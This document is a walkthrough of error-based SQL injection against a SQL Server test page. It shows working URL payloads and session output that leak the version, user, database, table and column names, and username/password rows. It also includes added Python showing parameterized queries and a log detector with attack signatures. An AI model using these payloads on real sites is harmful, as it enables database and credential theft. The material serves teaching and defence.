0x00 Test data
1> select * from article;
2> go
+----+-----------+-----------+
| id | title     | content   |
+----+-----------+-----------+
| 1  | 测试标题  | 测试内容  |
| 2  | 测试标题2 | 测试内容2 |
+----+-----------+-----------+
(2 rows affected)

# Test table data: users
sql server> select * from users;
+----+--------------+----------+
| id | username     | password |
+----+--------------+----------+
| 1  | test-user-01 | 123456   |
| 2  | test-user-02 | 234567   |
+----+--------------+----------+
2 rows in set (0.00 sec)

sql server> SELECT system_user;
+-----------------------+
| field1                |
+-----------------------+
| sa                    |
+-----------------------+
1 row in set (0.00 sec)

sql server> select db_name();
+-----------------------+
| field1                |
+-----------------------+
| test                  |
+-----------------------+
1 row in set (0.00 sec)
0x01 Dump the database version
Web request: http://www.test.com/sql.php?id=1 and 1=@@version
Database statement: select * from users where id=1 and 1=@@version
1> select * from users where id=-1 and 1=@@version;
2> go
22018 - [SQL Server]在将 nvarchar 值 'Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) 
	Sep 24 2019 13:48:23 
	Copyright (C) 2019 Microsoft Corporation
	Developer Edition (64-bit) on Windows 10 Pro 10.0 <X64> (Build 17763: ) (Hypervisor)' 转换成数据类型 int 时失败。
0x02 Dump the current connection user
Web request: http://www.test.com/sql.php?id=1 and 1=system_user
Database statement: select * from users where id=1 and 1=system_user
1> select * from users where id=1 and 1=system_user;
2> go
22018 - [SQL Server]在将 nvarchar 值 'sa' 转换成数据类型 int 时失败。
0x03 Dump the current database
Web request: http://www.test.com/sql.php?id=1 and 1=db_name()
Database statement: select * from users where id=1 and 1=db_name()
1> select * from users where id=1 and 1=db_name();
2> go
22018 - [SQL Server]在将 nvarchar 值 'test' 转换成数据类型 int 时失败。
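The three probes above all ride on the same defect: sql.php splices the id parameter into the SQL text and hands the engine's conversion error straight back to the browser. The following Python is an added example, not code from the original post, that puts the vulnerable pattern next to a hardened one. It uses an in-memory SQLite table as a stand-in for the page's SQL Server users table (the sample rows are the page's test data); the handler structure and function names are assumptions, and the db_name() probe is the page's own payload. The parameterized query and the error boundary transfer unchanged to a pyodbc or pymssql connection.

```python
import logging
import re
import sqlite3

# Constructed in-memory stand-in for the page's "test" database. SQLite is
# used only so the example runs offline; the pattern is engine-independent.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "test-user-01", "123456"), (2, "test-user-02", "234567")],
    )
    return conn


# Vulnerable pattern: the raw id parameter becomes part of the SQL text, so
# whatever follows the number is parsed as SQL by the engine.
def lookup_user_vulnerable(conn, raw_id):
    sql = "SELECT id, username FROM users WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


# Hardened pattern, step 1: the parameter must look like an integer id before
# it goes anywhere near the database.
def parse_id(raw_id):
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("id must be a positive integer")
    return int(raw_id)


# Hardened pattern, step 2: the value is bound as a parameter (the "?"
# placeholder), never concatenated into the statement text.
def lookup_user_safe(conn, raw_id):
    user_id = parse_id(raw_id)
    sql = "SELECT id, username FROM users WHERE id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


# The sql.php behaviour the page relies on: the engine's error text, which in
# SQL Server carries the leaked value, is returned to the client verbatim.
def handle_request_vulnerable(conn, raw_id):
    try:
        return {"status": 200, "rows": lookup_user_vulnerable(conn, raw_id)}
    except sqlite3.Error as exc:
        return {"status": 500, "error": str(exc)}


# Error boundary: the real engine error goes to the server log only; the
# client sees a fixed message, so a 22018 conversion error can no longer
# serve as an output channel.
def handle_request(conn, raw_id):
    try:
        return {"status": 200, "rows": lookup_user_safe(conn, raw_id)}
    except ValueError:
        return {"status": 400, "error": "invalid id"}
    except sqlite3.Error as exc:
        logging.error("database error for id=%r: %s", raw_id, exc)
        return {"status": 500, "error": "internal error"}


if __name__ == "__main__":
    db = make_db()
    probe = "1 and 1=db_name()"  # the page's 0x03 payload, constructed input
    print(handle_request_vulnerable(db, probe))  # engine error text reaches the client
    print(handle_request(db, probe))             # rejected before any SQL runs
    print(handle_request(db, "1"))               # normal lookup still works
```

Two things to take away: the validated, bound id never reaches the parser as SQL, so every probe on this page fails validation before a query is built, and the error boundary keeps the 22018 text on the server side where it belongs. The 0x02 session also shows system_user returning sa; neither fix changes that, so the application login should be a dedicated low-privilege user rather than sa.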
0x04 Dump database names
Note: changing the call to db_name(1) shows the names of other databases
For example:
db_name(1) returns the name of the database whose id is 1
db_name(2) returns the name of the database whose id is 2
Web request: http://www.test.com/sql.php?id=1 and 1=db_name(1)
Database statement: select * from users where id=1 and 1=db_name(1)
1> select * from users where id =1 and 1=db_name(1);
2> go
22018 - [SQL Server]在将 nvarchar 值 'master' 转换成数据类型 int 时失败。
1> select * from users where id =1 and 1=db_name(2);
2> go
22018 - [SQL Server]在将 nvarchar 值 'tempdb' 转换成数据类型 int 时失败。
0x05 Dump table names
Note:
The table_name inside OVER(Order by table_name) must be replaced with a column that actually exists in information_schema.tables.
To query a different database:
For example:
table_catalog=db_name() (queries the current database)
table_catalog='name of the database to query'
To query a different table:
For example:
set row_number=1 for the first table
set row_number=2 for the second table
Web request: http://www.test.com/sql.php?id=1 and 1=(select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1)
Database statement: select * from users where id=1 and 1=(select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1)
# Dump table 1
1> SELECT * FROM users WHERE id = 1 AND 1 = (
       SELECT table_name FROM (
           SELECT ROW_NUMBER() OVER (ORDER BY table_name) AS row_number, table_name
           FROM information_schema.tables
           WHERE table_catalog = db_name()
       ) AS a WHERE row_number = 1
   );
2> go
22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 int 时失败。
# Dump table 2
1> SELECT * FROM users WHERE id = 1 AND 1 = (
       SELECT table_name FROM (
           SELECT ROW_NUMBER() OVER (ORDER BY table_name) AS row_number, table_name
           FROM information_schema.tables
           WHERE table_catalog = db_name()
       ) AS a WHERE row_number = 2
   );
2> go
22018 - [SQL Server]在将 nvarchar 值 'users' 转换成数据类型 int 时失败。
0x06 Dump column names
Note:
The column_name inside OVER(Order by column_name) must be replaced with a column that actually exists in information_schema.columns.
To query a different table:
For example:
table_name='name of the table to query'
To query a different column:
For example:
set row_number=1 for the first column
set row_number=2 for the second column
Web request: http://www.test.com/sql.php?id=1 and 1=(select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name='users') as a where row_number=1)
Database statement: select * from users where id=1 and 1=(select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name='users') as a where row_number=1)
# Get the name of the first column of the users table in the current database
1> SELECT * FROM users WHERE id = 1 AND 1 = (
       SELECT column_name FROM (
           SELECT ROW_NUMBER() OVER (ORDER BY column_name) AS row_number, column_name
           FROM information_schema.columns
           WHERE table_catalog = db_name() AND table_name = 'users'
       ) AS a WHERE row_number = 1
   );
2> go
22018 - [SQL Server]在将 nvarchar 值 'id' 转换成数据类型 int 时失败。
# Get the name of the second column of the users table in the current database
1> SELECT * FROM users WHERE id = 1 AND 1 = (
       SELECT column_name FROM (
           SELECT ROW_NUMBER() OVER (ORDER BY column_name) AS row_number, column_name
           FROM information_schema.columns
           WHERE table_catalog = db_name() AND table_name = 'users'
       ) AS a WHERE row_number = 2
   );
2> go
22018 - [SQL Server]在将 nvarchar 值 'password' 转换成数据类型 int 时失败。
0x07 Dump row contents
Note:
The username inside OVER(Order by username) must be replaced with a column that actually exists in the users table.
To query a different row:
For example:
set row_number=1 for the first row
set row_number=2 for the second row
Web request: http://www.test.com/sql.php?id=1 AND 1 = (select cast(a.id as varchar)+'|'+cast(a.username as varchar)+'|'+cast(a.password as varchar) from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1)
Database statement: SELECT * FROM users WHERE id = 1 AND 1 = (select cast(a.id as varchar)+'|'+cast(a.username as varchar)+'|'+cast(a.password as varchar) from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number, * from users) as a where row_number=1)
# Query the first row of the users table
1> SELECT * FROM users WHERE id = 1 AND 1 = (
       SELECT CAST(a.id AS VARCHAR) + '|' + CAST(a.username AS VARCHAR) + '|' + CAST(a.password AS VARCHAR)
       FROM (
           SELECT ROW_NUMBER() OVER (ORDER BY username) AS row_number, *
           FROM users
       ) AS a WHERE row_number = 1
   );
2> go
22018 - [SQL Server]在将 varchar 值 '1 |test-user-01|123456' 转换成数据类型 int 时失败。
# Query the second row of the users table
1> SELECT * FROM users WHERE id = 1 AND 1 = (
       SELECT CAST(a.id AS VARCHAR) + '|' + CAST(a.username AS VARCHAR) + '|' + CAST(a.password AS VARCHAR)
       FROM (
           SELECT ROW_NUMBER() OVER (ORDER BY username) AS row_number, *
           FROM users
       ) AS a WHERE row_number = 2
   );
2> go
22018 - [SQL Server]在将 varchar 值 '2 |test-user-02|234567' 转换成数据类型 int 时失败。
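Every step from 0x01 to 0x07 leaves two traces a defender can look for: a request whose id parameter carries one of a small set of T-SQL constructs (@@version, system_user, db_name(, information_schema, ROW_NUMBER() OVER(, CAST(... AS VARCHAR)), and a 22018 conversion error from the driver on the application side. The following Python is an added example, not part of the original post, that runs those signatures over a few constructed access-log and application-log lines modelled on the requests above. The log formats, the client IP addresses and the English form of the driver message are assumptions; the Chinese fragment in the error pattern is the message text as it appears in the sessions above.

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the payload shapes used in 0x01 to 0x07. Requests are
# URL-decoded before matching so %40%40version and @@version hit the same rule.
SIGNATURES = {
    "version_probe": re.compile(r"@@version", re.I),
    "user_probe": re.compile(r"\bsystem_user\b", re.I),
    "db_probe": re.compile(r"\bdb_name\s*\(", re.I),
    "schema_walk": re.compile(r"information_schema\.(tables|columns)", re.I),
    "row_number_walk": re.compile(r"row_number\s*\(\s*\)\s*over\s*\(", re.I),
    "cast_concat": re.compile(r"cast\s*\(.*?\bas\s+n?varchar", re.I),
}

# Driver-side trace: SQLSTATE 22018 in either the English or the Chinese
# message text shown in the sessions above.
ERROR_22018 = re.compile(r"22018|Conversion failed when converting|转换成数据类型")

IP_RX = re.compile(r"^(\S+)")

# Constructed sample logs (not real traffic). Payloads mirror 0x01, 0x04 and 0x05.
ACCESS_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sql.php?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /sql.php?id=1%20and%201%3D%40%40version HTTP/1.1" 500 310
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /sql.php?id=1%20and%201%3Ddb_name(1) HTTP/1.1" 500 290
10.0.0.9 - - [01/Jan/2024:10:00:15 +0000] "GET /sql.php?id=1%20and%201%3D(select%20table_name%20from%20(select%20ROW_NUMBER()%20OVER(Order%20by%20table_name)%20AS%20row_number,table_name%20FROM%20information_schema.tables%20where%20table_catalog%3Ddb_name())%20as%20a%20where%20row_number%3D1) HTTP/1.1" 500 305
"""

APP_LOG = """\
2024-01-01 10:00:07 ERROR sql.php 22018 - [SQL Server]Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)' to data type int.
2024-01-01 10:00:30 INFO sql.php request served id=2
"""


def scan_request(line):
    """Return the sorted names of signatures matched by one access-log line."""
    decoded = unquote_plus(line)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))


def scan_logs(access_lines, app_lines):
    """Collect (source, signature names, raw line) findings from both logs."""
    findings = []
    for line in access_lines:
        hits = scan_request(line)
        if hits:
            findings.append(("request", hits, line.strip()))
    for line in app_lines:
        if ERROR_22018.search(line):
            findings.append(("conversion_error", ["22018"], line.strip()))
    return findings


def suspicious_clients(access_lines, min_distinct=2):
    """Map client IP to the set of distinct probe types it used.

    A single hit can be a false positive; several distinct probe types from one
    client is the enumeration walk described in 0x04 to 0x07.
    """
    per_ip = {}
    for line in access_lines:
        m = IP_RX.match(line)
        if not m:
            continue
        hits = scan_request(line)
        if hits:
            per_ip.setdefault(m.group(1), set()).update(hits)
    return {ip: sigs for ip, sigs in per_ip.items() if len(sigs) >= min_distinct}


if __name__ == "__main__":
    for finding in scan_logs(ACCESS_LOG.splitlines(), APP_LOG.splitlines()):
        print(finding)
    print(suspicious_clients(ACCESS_LOG.splitlines()))
```

Correlating the two sources is the useful part: a request matching a signature that is followed within seconds by a 22018 error from the same endpoint means the probe both reached the engine and had its result echoed back, which is exactly the condition this technique needs. If the error boundary from the earlier example is in place, the application log still records the 22018 entries, so the second half of the correlation keeps working while the client sees nothing.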
